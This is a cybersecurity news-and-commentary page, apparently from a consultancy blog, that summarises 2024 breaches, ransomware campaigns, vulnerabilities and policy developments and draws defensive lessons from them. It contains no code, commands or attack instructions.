BREAKING NEWS and LESSONS LEARNED

Cybersecurity changes faster than you can read about it. This page covers news, comments and lessons learned from around 10 of the 7000+ stories each month.

Dec 2024 Headline News: Updated December 2nd
#137 Amazing New Cybersecurity Methodology… To be clear, this our new cybersecurity methodology, which not might be actually amazing but addresses the issues that all the super-expensive IT-oriented methods, products just miss out causing chaos. Check out our new multi-layer cubersecuirty model just published in this month’s ISE magazine. Read all about it at cybyr.com/10layers. It certainly is news for us, builds on leassons learned, Zero Trust best practices and is our most thoroughly thought through piece of work since we began this journey.
News on Critical Infrastructure incidents is also tracked on the Critical Infrastructure page.  Click here to subscribe to our news update service delivered via email.

Some stories need a closer, more controversial look.

  • NaaS: A room full of elephants
  • GenAI: Show me the intelligence
  • National Public Data’s exposure of 3bn personal info items now holds the record. Privaterecords (MC2) is a close 2nd.
  • Crowdstrike /Microsoft: The biggest IT disaster of all time?  Estimated at a cost of $5.4bn.
  • Did AT&T open Pandora’s Box?
  • NIST’s Cybersecurity Framework has been lauded. We explain why we have a very different view to others about this.
  • How and why the Securities and Exchange Commission is attempting to bring accountability globally
  • The now infamous breach of the MGM hotel chain shows what happens when you don’t implement holistic cybersecurity.
December 2024 Headline News: 
November 2024 Headline News: 
#136 To end the month … It’s all too easy to get overwhelmed by the constant stream of new threats. We’ll end this month with the report that Russian threat actors have been planting malware from a site you just visit then just leave using an exploit in Firefox’s browser in combination with an escalation of privilege bug in Windows 10, 11. The vulnerabilities have been fixed as reported by Sentinel One saying that neither company (Mozilla nor Microsoft were aware of the problem and the adversary’s use of an APT to plant malware in end user systems. The only lesson to be learned it seems is to use anti-malware software to prevent accidental (or otherwise) visits to malicious sites where such zero touch traps lie in wait.
#135 Here’s a Shocker Cybersecurity Insider’s new study of 417 companies showed that only 17% did not have an insider attack this year. That means 83% did! A massive uptick from 2023. The attacks are no doubt attributed to more sophisticated phishing scams credential theft, etc., rather than an increase in an employees’ criminal intent. The report makes interesting reading.
#134 Even the Security Software “leaders” are not immune Following the entry below, one of the largest software security vendors is clearly not up to speed with DevSecOps. A significant Zero Day breach of Palo Alto Networks software reportedly compromised more than 2000 deployed firewall products. It was reported by NIST as CVE-2024-0012 and CVE-2024-9474. One report even said that there were developer comments in the code questioning the veracity of the code. Whatever the actual situation, the lesson remains the same as the incident below. There has to be some checks and verification done whether internally or in collaboration with top customers. The days of trusting suppliers has to be put in the past.
#133 Hey, This Coffee Tastes of Malware! As you likely saw in the mainstream news, once again a company providing software to a many organizations was hacked. Starbucks was forced to pay its baristas manually because of a ransomware attack on third-party software Blue Yonder, an Arizona-based cloud services provider. This also affected many of the top grocery stores in both the U.S. and the U.K using their software. Jumping to the conclusion that they didn’t do the basics or deploy at least some level of Threat Detection and Removal Software is likely what happened. This type of attack scales to affect many companies taking advantages of poor software supply chain discipline and the abdication of responsibility by its customer/clients as we covered here: https://cybyr.com/delegation/.
#132 Phocus on Phishing As reported by MSN, Microsoft Digital Crimes Unit has seized 240 fraudulent sites used by PhaaS (Phishing as a Service platform) ONNX to sell phishing templates that have generated millions of phishing attacks. In other phishing news a scam reported by The Cyberguy reports many being taken in by official looking emails from what appears to be Apple.
#131 Dark Clouds Looming All sorts of rumors are spreading through the U.S. Government security community ahead of the new regime including the upcoming resignation of Jen Easterly – head of CISA – and the upcoming surge of Russian threat actors. More to follow …
#130 Small to Medium Businesses Under Increasing attack. KnowBe4 just reported the staggering and completely unsurprising news that more than half of all ransomware attacks this year have been on small businesses. The attacks increase and yet not nearly enough is being done to address this! Maybe reading my “Cybersecurity For Small & Medium Organizations” would be a good place to start!
#129 Security Defense Software Targeted People who purchase cybersecurity software obviously have something to defend, right? Why else would anyone invest money unless the cost of potential ransomware wasn’t crippling? This is all an intro to a non-surprising report of security software companies being the target of cyberattacks. A report from SecurityDive  says that “Zero-days from the top security vendors were the most exploited CVEs.” Five well known companies and obviously their customers were targeted. That report was based on 2023 data but a new report shows it’s still happening today with Palo Alto Networks’ customer migration tool hit by a trio of CVE exploits.
#128 Phishing A new report published by MSN shows that a massive increase in AI-based phishing is resulting in companies being barraged by phishing attacks that are defeating Secure Email Gateways (SEGs) and native defenses like Microsoft 365’s security features.
#127 Critical Infrastructure Focus Many news items have brought Critical Infrastructure to the fore this month. Halliburton, a global provider of products and services to the energy industry reported losses of $35m to the SEC after a ransomware attack took down systems of the $23bn revenue company. Healthcare attacks continue to escalate according to government warnings in a new report in government info security . The increases in healthcare attacks buck the trend in other industries as reported in a Sophos report covered here. Even German pharmaceutical wholesalers didn’t escape. In the US, the Transportation Security Administration (TSA) has unveiled a long-awaited proposal for cybersecurity mandates for pipelines and railroads covered in the article by Meritalk. Finally, the latest story mid-month is of Iranian attacks on the airline industry with a phishing/APT attack promising dream jobs to the cybersecurity-unwashed masses.
#126 Advice to Lawyers Having heard many stories regarding breaches at legal firms, I was not surprised when I read this article. It typifies many market sectors who get superficial advice on some actions to take but almost no help on implementation or on the scope of work required to protect and organization. I include this article from Above the Law not to criticize this particular, well-intentioned piece but as an example of how much more is required to minimize risk. Published in a few weeks and continued on this site is a radically different approach, Watch this space.
#125 Arrests follow Seizure of 22,000 Malicious IP addresses A breach of Cloud Storage company Snowflake led to the theft of credentials from 165 major organizations. Snowflake announced that it will enforce MFA and strong passwords. Great – bit late now. Shame they didn’t act ahead of this. However, a new Interpol operation resulted in 41 arrests and taking down of 22,000 malicious IP addresses. Read more on this week’s from SetinelOne.
#124 Ascon Encryption Progress 20 months after the initial selection of a new lightweight encryption methodology for IoT and IIoT devices, NIST announced the first draft standard based on Ascon. This will be an important step in the protection of devices used in healthcare, ICS and all manner of Critical Infrasturcutre, OT and non-IT systems
#123 Panic over It turns out that there were no serious election day issues caused by cybersecurity breaches – other than the odd fake bomb threats attributed to Russians – unless somehow all the voting systems or counting systems were penetrated before they were disconnected from the internet. That would have been tough because ery state had its own system of voting and collecting and counting. A strange but effective defense, it seems.
#122 Panic in the Streets Election nerves in the U.S. are impacting most of the U.S. population creating the right atmosphere for all manner of fakes, phishing and cybersecurity attacks. Whatever the result threat actors are exploiting all opportunities to disrupt before and cause chaos after the election – with examples in the last week of October.
October 2024 Headline News: 
#121 Holistic Cybersecurity attacks These two instances were examples of attacks beyond the walls of the IT department, impacting web presence usually managed by marketing companies or outsourced by SMBs. The first shows the dangers of using WordPress Plug-ins. There are 50,000 of these and they are largely unsupervised and casually used by unsuspecting web site managers. Bleeping Computer’s article shows how 6,000 web sites were affected by just one of these fake plugins! Web hosting companies aren’t immune either. Another software company, Cyberpanel (web hosting control panel software) used by hosting companies such as Digital Ocean was compromised impacting 22,000 sites – as also revealed by Bleeping Computer in a separate article. These are not one-off instances – they are frequent occurrrences. The lessons to be learned here are: implement the hosting site firewall software, minimize the use of plugins to, as the first article states, well known reputable plugins and as in #119 below, validate all third party supply chain companies and their products. (End of rant).
#120 As If the separation in the US wasn’t bad enough … Jen Easterly (Director of CISA) describes in a PBS interview the Russian, Iranian and Chinese frauds and scams aimed at undermining US election credibility and fueling discord. She explains that the electoral system is much more robust than four years ago
#119 Supply Chain Risk Management. Security company Crowdstrike’s regression testing lapse was not a security software company breach – but these two were. ArcticWolf reported that  Sonicwall Firewalls were the initial access point for 30 Akira ransomware attacks. Fortinet disclosed two vulnerabilities. One CISA listed by SentinelOne  as CVE-2024-47575 – a protocol error between two Fortinet security products using unauthorized APIs. It revealed 50 customers were affected. The news is hardly news since it happens often. The question is why are cybersecurity companies who should be most vigilant be so seemingly weak in creating their own products free from weaknesses or recognizing the same faults that hackers who don’t have the same access to code are able to find. Perhaps the attackers are just smarter?
#118 It’s all about protecting the assets. Finally, making the news is coverage of protecting data as the the prime organizational concern. Specifically, the stewarding of assets (data, software, intellectual property and all electronic valuables) offline is vital since the back-up of such information is the first target of ransomware threat actors. Offline storage is covered in this new article from Data Center Knowledge is the first to cover this critical topic.
#117 Cybersecurity Awareness Month Awareness is a key defense. It’s  the necessary opposite of “Cybersecurity? We sorted all that out last year”.  A new article from SentielOne lists the top 26(!) current ransomware attack types and reminds readers that the increasing types and scope of Ransomware are a cautionary tale to remain vigilant – and yes it includes a pitch for their products to provide defense but it makes an interesting read. Our contribution to cybersecurity awareness month can be found on the cyberpedia page on this site. New additions cover the steps of Advance Persistent Threat Attacks and details of MITRE attack techniques are described. Finally, in preparation, is an addition to this site covering detection and defense against Ransomware in wide area network services when breaches occur.
#116 Living-off-the-Land Having just written a paper on ransomware detection after a breach has occurred in the network, this article caught my attention. A new attack (OilRig) has been exploiting a Windows Kernel vulnerability (CVE-2024-30088) to exploit Exchange servers for credential theft and to escalate privilege and allow a Remote Code Execution. This ploy to infiltrate standard system software known as a Living-off-the-Land Attack is a typical element of an Advanced Persistent Threat attack. More on this story soon.
#115 Cybersecurity Awareness Month Lurches on Perhaps it should be renamed Ransomware month. With reports on Ransomware attacks on Veem (backup systems), infected thumb drives being slipped into air-gapped systems and many healthcare attacks account for 68% increase in first half losses. The question is what lessons can be learned? Increasingly sophisticated Phishing as a Service employs several different penetration attacks at the same time (Social Engineering, email and AI based phishing, identity theft with new Adversary-in-the-Middle (AiTM) attacks). Once inside both exfiltrates data then encrypts data and software. I.e. the lesson is that all defenses must be strengthened – just doing one or two does not cut it.
#114 30% Increase in Numbers of Ransomware Groups and Attacks The number of Ransomware Groups grew annually by 30%. A detailed and impressive new report by Secureworks identifies the top ransomware groups and how they are using new techniques for identity theft, etc. Not only are they growing in numbers but they are collaborating and organizing as they share increasingly sophisticated strategies. All this is despite the increased availability of defense tools. Link to Secureworks news release and Infosecurity article. In a related article, ITPRO just reported 450 new Ransomware attacks in August – a 14% jump from July. The article also named the threat actors concerned and show year-over-year changes.
#113 US Telcos under attack Unconfirmed by AT&T, Lumen and Verizon and denied by Chinese authorities, the Wall Street Journal reported that a coordinated and concerted attack by Chinese attackers using an Advanced Persistent Threat (APT) know as Salt Typhoon had systematically attacked top U.S. Telcos. Targeted were court-authorized wire taps! If that was bad enough the larger concern is the potential vulnerability of all national and international communication system. The ability to combat these attacks is exacerbated by the limited number of defenders v. attackers. This link is to the CNN report.
#112 AI Networking Just published is our new article on AI Networking. This developing story begins here.
#111 Do you recall Recall? As you may remember, Microsoft’s guardian angel Recall was recalled after the furor about having big brother watching you every step of the way as part of their new Co-Pilot laptops and Windows 11 software whether you liked it or not. For those not following, every action and site visited is tracked and saved “just in case you need it.” It comes with potential high risk of intrusion and cyber-exploit. Undaunted, a new opt-in version is being relaunched. My concern is that those who are less security aware are generally naive will have their entire life exposed. History is not on Microsoft’s side. I will not be opting in.
#110 MFA Vulnerabilities Like all other defenses, MFA has it’s vulnerabilities.  HelpNetSecurity revealed last week how Session Hijacking can infiltrate user-web transactions and creating an MFA bypass that is becoming a critical security and ransomware issue.  Session Hijacking is where legitimately authenticated users have their valid session ID impersonated by threat actors. The Descope web site does a nice job of describing it and suggests ways to prevent it.
 
September 2024 Headline News: 
#109 Are those Clouds safe?  Lurking inside those comforting Clouds all may not be well. Microsoft’s latest intelligence blog warned that the Storm-0501 threat actor’s latest ploy is to access Micosoft’s Entra-ID cloud accounts and use lateral movement to cause disruption. More on this in Register’s article on the topic. 
#108 Behind the front lines of the Cyberwar Revealed at the end of September was that Chinese state-linked hacker attacks have since May been accessing email accounts at around 25 organizations, including the U.S. Commerce and State Departments. What was contained in the 60,000 emails that impacted 25 departments was not revealed, but one can only imagine how strategies and physical defense initiatives could be compromised and lives put at risk. However, this form of attack sounds much cheaper that infiltrating those departments with actual physcal spies.
#107 MC2 Private Data breached Similar to last month’s breach at NPD, detailed personal data – to the tune of 100m+ individuals was lost by background check company MC2 (website privaterecords.net)  See the in-depth report in The Blog.
#106 SeaTac Dilema Lessons not yet learned – we can only guess. Almost one month after the  breach at Seattle-Tacoma International Airport (SeaTac) we are none-the-wiser about the cause of the breach. Of course, nothing was revealed at the mid-September Senate hearing. Yes, there is speculation about what data was stolen and published on the Dark Web and we hear that the $6m ransom is not being paid (a good thing). What we don’t know is which of their many systems were compromised or how it was done. We don’t know what threat detection systems have been deployed if any or which security software was used. We really hope that there was some Extended Detection and Removal (XDR) software and it was not compromised. XDR is most important since it follows Zero Trust’s “Assume Breach.” to look for Lateral movement etc. Of course we don’t know how the initial breach happened, anything about their data and software management or how it could impact other airport systems worldwide. Two other detection and rsponse software tools are also available: Network Defense and Response (NDR) and Cloud Dection and Response (CDR) software for decting exploits within a network or Cloud systems following a breach. As announced by the Department of Transport: “Cybersecurity is a safety issue.”  It’s appropriate that SeaTac not disclose any of this publicly or even to other airport organizations for sound security reasons but it makes it very hard to even guess what specific lessons can be learned. This lack of shared intelligence weakens everyone’s defenses. Any delay on fixing and deploying any actual software, system or device problems must make the attackers job easier.
#105 CISA aligns civilian cybersecurity strategy.

In a surprising development, CISA appears to have adopted cybyr.com’s principle approaches to cybersecurity. Or, to put it another way, CISA continues to provide sound guidance that we would agree with. The five priority areas for Federal Civilian Executive Branch (FCEB) agencies are:

  1. Asset management (a little generic)
  2. Vulnerability management (perhaps light on departmental vulnerabilities)
  3. Defensible architecture (including applying Zero Trust principles)
  4. Cyber supply chain risk management (following validation best practices)
  5. Incident detection and response.

Although targeting FCEBs the principles apply anywhere. Download the report from the CISA website.

#104 Two new in-depth blogs Two highly topical issues: AI and Network as a Service are covered in two new blogs on this site. The AI topic reflects on the implied intelligence of GenAI compared to earlier AI products. The NaaS piece looks at some of the issues that could prevent the new iteration of networking becoming the next big thing.
#103 Park here at your own risk. If you’ve ever parked at one of those unmanned city parking lots that require you to pay by going to a website, then you are in for a choice of special treats. You can either go to their unofficial and potentially infected web site and pay and bunch of spurious fees or use your phone to access the QR code which could have ben put up by anyone and have your personal data stolen via a “Quishing” attack or you can find a better place to park.
#102 Mind the gap As an advocate of Air Gapping of critical data, software and all critical asset information, this story is sobering. For those creating a virtual air gap between IT and Operational Technology networks the same may apply. This also relates to deploying properly certificated device drivers in all systems. It turns out that a threat exists whereby malware in device drivers loaded into such systems can exfiltrate stored encryption keys, biometric info, etc., using electromagnetic waves! Another method involves use of infected flash drives attached to air-gapped systems. I.e. the bottom line is that it is not sufficient to isolate backup systems from wireline and wireless communications but to be aware of all potential breaches, such as this Sci-Fi style attack. Such attacks are not just theoretical but have actually happened. This story was reported by Steve Gibson in this week’s Security Now podcast. More details on page 14 of his weekly notes.
#101 Don’t tap your picture A “dangerous” Android phone exploit discovered by McAfee and covered in a story by Forbes reveals an exploit that downloads fake apps, disguised as one of 280 genuine apps. This results in accessing your photos – dangerous in itself for any number of phishing attacks – but more immediately target stored 12 word pass-phrases to access crypto wallets.  Google is working on a fix to the issues, but for now don’t click on a message that has you and your friend in a picture. (Yikes!)
#100 How low will they go? Our 100th story of the year sets new lows for hackers. In London, Forbes reported that “despicable” hackers held disabled bus users to ransom and SC Magazine reported that Montana healthcare Planned Parenthood services had also been held to ransom. However, rather than jumping to a moral judgment, the phrase “it’s only business” comes to mind since the reason for the existence of hacker organizations is financial rather than even political. (It still sucks.)
#099 Ransomware groups up, victims down.  Security Magazine reported that the first half of 2024 saw a 56% increase in the number of ransomware groups compared to the same period of 2023. Actual victims were down slightly. The article speculates the decrease in victims on law enforcement efforts. The lesson to be learned is that threats are constantly changing and awareness of the changes is almost daily. The trend also shows that the use of Ransomware as a Service has become the norm for the delivery of  Advanced Persistent Threat (ATP) attacks. These are problematic because they include difficult-to-defend Lateral Movement elements that explore vulnerabilities in your system.
About ATPs and XDR The most important defense to Ransomware as a Service that enables ATPs is provided by Extended Detection and Removal (XDR) software. It’s important because when all other defenses fail and a breach has occurred this is the only systematic detection and removal mechanism available.  but it is not currently clear how effective these tools are or which ones to choose. More on this separately including a list of software choices. One of those companies (Barracuda) produced an interesting report showing that 44% of Ransomware attacks included Lateral Movement. Other activity detected suspicious file changes and in a network or system. The effectiveness of XDR is clearly a very important topic since it acts as a backstop when all other defenses have been breached. As Zero Trust states: “Assume Breach.”
#098 Collaboration or passing the buck? We are promised the outcome of the Microsoft Cybersecurity event (September 10th) relating to the Crowdstrike incident will be made public. You know, the one where the whole world was exposed by lack of regression testing by Crowdstrike and lack of product verification by Microsoft. The BandAid being discussed is how can software avoid that requires “Privileged Kernel Mode” being able to effect the same results by operating in “User Mode.” Apart from not addressing the root cause of the problem mentioned above, this would be in possible contravention of an EU ruling and would favor those companies (i.e. Microsoft) who are able to write apps in privilege mode. In fact, Microsoft already has a competitive product that it sells. More to follow and also see the In-depth write-up.
#097 Will they ever learn? It is astonishing that supposedly responsible companies still can’t do the zero-cost cybersecurity basics. According to Bloomberg Law, Communication Federal Credit Union’s “reckless” cybersecurity practices led to a January data breach. They failed to basic practices such as installing anti-malware software, performing regular audits, and implementing multifactor authentication despite public statements to the contrary.
Aug 2024 Headline News. The worst month ever? Of 10,000 posted, here’s another 100+ stories
#096 Using Chrome to store your passwords? If the answer is yes, then you are a target. Cybernews revealed that the Qilin ransomware group are the culprits. On average those who store passwords in Chrome (they have 65% market share) average 87 passwords stored. Time to use one of those intrusive password managers or passkeys. Pick one that hasn’t been hacked.
#095 “Here’s your room key, sir.” “No, I don’t need it” In an insidious back door in RFID key cards means that there is simple access to hotel room key and many other card access systems worldwide. The culprit is the Chinese manufacturer who has marketed this as a new and more secure system when actually it seems to have deliberately left a back door in the system that is easy to exploit. Security Now (see page 2) revealed that threat actors can clone the smart key cards and gain access to commercial and military targets.
#094 Your Contactless Payment may be your last. Reported by The Hacker News, a new malicious application installed on an Android phone can send contactless card information with the intention of conducting fraudulent transactions. The “NGate” software is installed via social engineering not via the Google playstore. See the article for further info, though the exact details, prevention & cure are not included. However, disabling NFC (Near Field Communication) on your phone via “settings>connected devices” and toggling off NFC devices, will disable the function that the malware uses.
#093 Downloading Movies from the Internet? Think again. A nasty new exploit was discovered by Mandiant and reported in another article by The Hacker News. Search for videos online and you come across a supposed pirated movie that you can download.  A new embedded malware gets downloaded by a sophisticated dropper software and the resulting code is executed. The article documents step-by-step the highly detailed process. Lesson learned: just don’t do it.
#092 Government Oversight Testing the Water By filing a federal complaint, accusing Georgia Tech of failing to meet cybersecurity requirements, the DOJ is likely testing the water on its ability to enforce cybersecurity regulations. Whether it wins or loses the case is likely less important than the lessons that will be learned. It’s claims that Georgia Institute of Technology failed to follow adequate security for sensitive government information. I.e. it’s taking steps related to information that it is responsible for, perhaps without properly validating the protection was being enforced. Details here.
#091 Disastrous loss of our identities. National Public Data – a service provided by Jericho Pictures of Florida, revealed that almost 3 billion data personal records have been hacked including full names, addresses, SSNs in plain text and 130 million unique email addressesThis is easily the biggest theft of personal data of all time. The story continues on our In Depth Page.
#090 Post-Quantum Encryption Breakthrough NIST just announced that it has released a final set of encryption tools designed to withstand the attack of a quantum computer. These tools have the potential to prevent the disastrous decryption of most modern asymmetrical encryption system central to the privacy and secrecy of most financial, security, government and personal network-based communications.  NIST has finalized its principal set of encryption algorithms designed to withstand such cyberattacks. It is encouraging computer system administrators to begin transitioning to the new standards as soon as possible.
#089 Phishing and  Ransomware out of control? More than 300+ ransomware, breaches, phishing and cybersecurity stories appeared on August 11th alone (including hacking of Trump’s email). This represents a significant uptick over previous levels, yet still small and medium size organizations think it won’t happen to them. See #86 below.
#088 No rush to Pay Ransomware According to security firm Semperis, 74% companies attacked by ransomware are then attacked multiple times also 78% paid the ransom. Like missing a bus, don’t worry another attack will be along shortly. (Good grief! It’s clearly going to be a challenge to cover only 10 stories this month with a slew of healthcare and farming attacks)..
#087 DMARC Bypass Attack Security Magazine’s report on a Darktrace report that 62% of phishing emails – they analyzed 17.8 m – were able to bypass the domain-based message authentication, reporting and conformance (DMARC) checks that have been design exactly to prevent this problem.
#086 Breakthrough in SMB Cybersecurity This is my modest title about our new methodology for small and medium business that have no budget, expertise or resources while have a massive lack of awareness that they are at risk. My just-published ISE article and web page is accompanied by a September 19th Workshop and implemented with the new Virtual CSO Service. Our transformative purpose is clear “Every small and medium size organization is protected from attack.”
#085 Why didn’t they do that sooner? With so many ransomware attacks, even this week’s theft of three terabytes of Columbus, Ohio employee personal information supposedly – stolen and put up for auction – would not warrant a mention here. However, the proposed bill from the Senate Intelligence Committee would elevate such crimes as a terrorism threat. Perhaps that would not be a deterrent to the threat actors but it could not only dramatically increase the powers of response but also the raise realization of all organizations that we are actually at war – an undeclared one – with nations who sponsor the exploitation. The question could also be – “With all of the Russian, North Korean and Chinese-based threat actors, why on earth wasn’t this done earlier?” Cyberscoop’s article goes into the ramifications but does not cover how it might impact an organization’s cybersecurity insurance that could respond differently to “acts of terrorism” (or war). Columbus Footnote: Two Columbus police officers filed a class action lawsuit against the city with bank accounts likely compromised and 200,000 employees information being made public. (Good Grief!).
#084 Microsoft Phishing Defense – A False Sense of Security? Anti-phishing software has become a pillar of today’s defenses. However, having flawed protection is worse than I having none – because you rely on it and are less cautious. Infosecurity magazine reported this week that ” a vulnerability in Microsoft 365’s anti-phishing mechanisms, can be exploited using CSS allowing attackers to bypass safety alerts, raising concerns about the  Microsoft’s phishing defenses.”
#083 AI and Cybersecurity Will the AI bubble burst? Will the world get that maybe it should be called Artificial Unintelligence, since it is not really applying actual human intelligence? Will enterprises figure out how to create useful Large Language Models from all their legacy and dispersed data? Most have not yet. Then there’s lots of smart hackers trying to leverage all of this. Or will all of the baby steps in GenAI get sorted out and we’ll get something that’s usable because if they can then there’s the promise of something transformational. Given that protection is a key issue, CISA just appointed its first Chief AI Officer, Lisa Einstein to oversee the secure development and adoption of AI across the United States. There will be much more on AI in networking and cybersecurity on this site as it progresses.
#082 Here come the suits – the law suits that is. Crowdstrike’s loss of market value of $25bn following the release of poorly tested software has led to the first of likely several law suits representing the shareholders and citing various wrongdoings and misleading statements. I am aware that the “incident” clocked up at least $5.4bn of losses (Delta airlines alone said it cost them half a billion).  However, it seems that likely one process or coding mistake should not bring down an otherwise reputable company with good support and valuable protection to its customers – especially when others shared the responsibility.
#081 Platform Key Vulnerability We all scoff at users who don’t change their default username and password (e.g. username: user, password: password). What we don’t expect is that for years, PC manufacturers have been shipping products with a Platform Key with the key “Do Not Ship” and “Do Not Trust.” This week Binarly (developers of a risk intelligence platform) revealed that most of the industry’s PC shipments have had their security compromised. Platform Key is the Secure Boot master key on which Secure Boot depends. First discovered in 2012, products, yet today are still being shipped with the same key.
July 2024 Headline News – A crazy month with more than 120 important stories
#080 Update or not? As a follow on to the Crowdstrike/Microsoft incident, the question of automatic update needs to be addressed. Manual or delayed software updates open the door to threat actors to instantly attack. The average time to update has been a staggering 63 days. So, prudent end-users have a policy of testing updates before automatically rolling them out. Interestingly a government mandate requires PCs to implement an update an exploit listed as CVE-202438112 or they will be shut down.  A VMWare patch to CVE-2024-37085 was reported by Microsoft  as still being being exploited. The answer is clearly for larger companies a staggered rollout so that any disruption can be caught before problems become widespread. In fact, several enterprises did exactly this and were saved. At the end of July, Sentinel One was debating the frequency of updates. It should also be pointed out that good cybersecurity systems should be self-adapting to distribute new learned threats and to generate and share new defenses among installed systems. This does not imply the use of Adaptive AI techniques.
#079 Insider Out In the current trend of targeting cybersecurity companies took a sureal twist when security firm KnowBe4 inadvertently hired fake IT worker who was actually working for North Korean  state-sponsored hacker.
#078 Meanwhile in other news …. As the world piles on to Crowdstrike for what is likely to be an important lesson for all, six other cybersecurity stories churn on in just the last 48 hours: in Los Angeles, the entire court systems that spans 36 courthouses and handles 1.2 million cases per year is currently shut down because of a ransomware attack – that’s one way for Hackers to avoid prosecutuion. The estimated cost of the Change Healthcase debacle has now been re-estimated to $2.3bn. The fragility of other software was shown with North Korean APT attacks on software company JumpCloud and vulnerabilities of Google privilege were realized with a privilege escalation design flaw. Returning to Crowdstrike, it appears that Crowdstrike’s platform is not available to smaller companies – so that’s something. Finally, Cisco managed to to chalk up a rare CVE 10.0 rated vulnerability allowing unauthorized users to do well – anything.
#077 Major Costly Outage caused by cybersecurity prevention. A systemic software supply chain failure (the automatic update of Crowdtrikes Falcon software) caused the biggest IT disaster of all time on July 18/19th. An example of software created to prevent attacks being worse than the attack itself with 8 million crashed Windows PCs and 26,000 affected companies, 4,000 flights cancelled and so much more. The full story is now covered at cybyr.com/hottopics. As an end-of-the month update, many straightwaford recovery steps were available direct from Crowdstrike including Cloud-based restarts.
#076 2 year-old AT&T story – suddenly Breaking News? The strange thing about this story is that it’s suddenly news. The question is why? It may be no coincidence that the timing of these disclosures and revelations are an attempt to ward off potential legal action as they come on the same day that the SEC has further strenghten its breach reporting regulations. Something doesn’t seem quite right here. In fact, wait … it involves problems for all  This seems to be a disaster.  See the full coverage at cybyr.com/hottopics/. Update: However, It appears that this is not really an AT&T story at all though what they did made it worse! The issue appears to be due to a breach at Snowflake the massive Cloud data and compute broker, whereby 400 of their customers had their credentials stolen. Well, Snowflake is blaming authentication weaknesses on its customers. Their users refute this. It does appear that Infostealers penetrated a Snowflake staff account and exfiltrated 400 customer company’s credentials who didn’t have MFA. Be that as it may, their end user customers are not off the hook because they did not properly delegate their responsibility – they abdicated it to Snowflake. This is not nearly the end of this and everyone is blaming everyone else! Lesson to be learned: adopt cybyr.com’s delegation methodology. Unbelievable.
#075 I’m OK, My Data is Backed Up. Time to be a bit scary. It’s touted that if we have our data backed up and even encrypted too, then we can’t be hacked. Even if we are hacked then our data is not lost and our business won’t be disrupted. Well, a survey conducted by YouTube Blog Veeam revealed that 96% of hackers target data backups, 76% were impacted only 20% were unaffected. Good Grief! Lesson to be learned: Notwithstanding other defenses, is having a Resilience Plan that backs up clean data that is encrypted and NOT online (as in there is an air-gap). A critical part of the plan is to both test the recovery and that such recovered data is scubbed for the presence of malware. Alternatives may be use of Cloud-based Backup as a Service (BaaS) or Disaster Recovery as a Service (DRaaS) but these need careful investigation too. (See also our notes on Asset Curation)
#074 The Benefits of a Cyberattack! What? Surely not! This is not actually a news item but maybe it should be. It was an insight from Heather Hughes of AON. What was revealed that companies who successfully defend an attempted breach and disclose both their breach attempt their dedication to security processes saw a 9% increase in their share value. This includes proper notification of such breaches and also applies to non public companies. This is all about the implementation of successful resilient asset curation, training and more. The reverse is also true. Loss of revenue, loss of share holder confidence, delays in operation by not following best practices. The lesson to be learned: following holistic cybersecurity best practices is a huge competitive business advantages.
#073 Chevron Ruling Reverberations The reverbarations from the “Chevron” ruling continue. First reported in #069 below, this new ruling overturns the 1984 case’s requirement for companies to defer to the federal authorities who it seems will have no longer have power to enforces their regulations such as breach reporting. The jury is still out on the ramifications but it has the potential to damage the saftey of organizations and their customers. (Update:It has also – according to the Daily Scoop – put the U.S. Government’s active but fragmented cybersecurity and new AI initiatives into a state of uncetrainty since it is no longer clear if, which and how enforceable these regulations have become with the Chevron ruling.) The article (#074 above) brings some business motivation.
#072 Much too Open SSH Esteemed for its long-standing security, Open Secure Shell has been vaunted as the right way to write code. Open SSH encrypts identities, passwords, and data avoiding theft. Unfortunately, a recent upgrade reintroduced an old flaw that created a vulnerability that exposes millions of Linux devices around the world. Discovered by Qualys Threat Research Unit, the flaw the report reveals why and how the vulnerability occurs. One drawback of explaining how it can be breached is that it educates threat actors on how to exploit this breach. It might be fair to question the integrity of the Open SSH group’s regression testing but more importantly it highlights the amount of care required when considering upgrades to such a pivotal piece of code.
#071 Team Viewer Breach A report from Cybersecurity Dive covered TeamViewer’s IT network breached through compromised employee credentials. It’s the same Midnight Blizzard attack that hacked into TeamViwer partner Microsoft. Although none of the 640,000 customers data was breached, either the breach was looking for employees with admin privilege that could cause further problems or was planning more mischief for the company itself.
#070 New Holistic Cybersecurity Lesson The ransomware breach at Infosys McCamish Systems that occurred in November 2023  was just revealed to have impacted more than six million of its customers. The lesson being that delegation to outside consultants (like cybyr.com!) is not risk free. Not only Infosys but other firms including those brought in to deal with ransomware(!) must also be treated with caution and that a consultant firm’s own security must be verified prior to engagement. It’s no surprise that not following the basics, like properly backing up data (as just happenend in Indonesia) enables ransomware.
This page was getting too big! See Breaking News – First Half of 2024